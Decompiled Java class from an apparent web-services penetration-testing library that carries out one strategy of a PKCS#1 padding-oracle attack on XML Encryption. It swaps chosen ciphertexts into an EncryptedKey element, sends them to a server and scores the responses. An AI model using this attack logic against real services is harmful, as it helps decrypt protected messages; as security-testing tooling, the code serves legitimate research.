/*
 * Decompiled with CFR 0.152.
 */
package wsattacker.library.xmlencryptionattack.attackengine.oracle.concrete.pkcs1.strategy;

import org.apache.log4j.Logger;
import org.w3c.dom.Document;
import wsattacker.library.signatureWrapping.util.exception.InvalidPayloadException;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.request.OracleRequest;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.base.response.OracleResponse;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.concrete.pkcs1.PKCS1Oracle;
import wsattacker.library.xmlencryptionattack.attackengine.oracle.concrete.pkcs1.strategy.AbstractPKCS1Strategy;
import wsattacker.library.xmlencryptionattack.avoidingengine.wrappingoracles.weakness.EncryptedKeyRefWeakness;
import wsattacker.library.xmlencryptionattack.encryptedelements.ElementAttackProperties;
import wsattacker.library.xmlencryptionattack.encryptedelements.key.EncryptedKeyElement;
import wsattacker.library.xmlencryptionattack.util.ServerSendCommandIF;
import wsattacker.library.xmlutilities.dom.DomUtilities;

public class NoEncryptedKeyRefStrategy
extends AbstractPKCS1Strategy {
    private static final Logger LOG = Logger.getLogger(NoEncryptedKeyRefStrategy.class);

    public NoEncryptedKeyRefStrategy(PKCS1Oracle pkcs1Oracle) {
        this.m_PKSC1Oracle = pkcs1Oracle;
        if (!(this.m_PKSC1Oracle.getAttackPayload() instanceof EncryptedKeyElement)) {
            throw new IllegalArgumentException("PKCS1ErrorOracle defined but no encryptedkey attack palyoad set");
        }
        ElementAttackProperties attackProps = this.m_PKSC1Oracle.getAttackPayload().getAttackProperties();
        EncryptedKeyRefWeakness.deleteOldEncKeyReference(attackProps.getAttackPayloadElement());
        this.m_AttackPayloadKeyDmy = new EncryptedKeyElement(attackProps.getAttackPayloadElement());
    }

    @Override
    public OracleResponse handleRequest(ServerSendCommandIF serverSendCmnd, OracleRequest request) {
        OracleResponse respMaxScore = null;
        String responseServer = null;
        OracleResponse resp = new OracleResponse();
        Document attackDocument = this.m_AttackPayloadKeyDmy.getEncryptedElement().getOwnerDocument();
        this.m_AttackPayloadKeyDmy.getCipherDataChild().setEncryptedData(request.getEncryptedKeyBase64());
        try {
            this.m_PKSC1Oracle.handleTimeStamp(attackDocument);
        }
        catch (InvalidPayloadException ex) {
            LOG.error((Object)ex);
        }
        responseServer = serverSendCmnd.send(DomUtilities.domToString((Document)attackDocument));
        resp.setResponse(responseServer);
        respMaxScore = this.m_PKSC1Oracle.getOracleBehaviour().compareServerRespWithUserClassification(resp, this.m_AttackPayloadKeyDmy);
        return respMaxScore;
    }
}

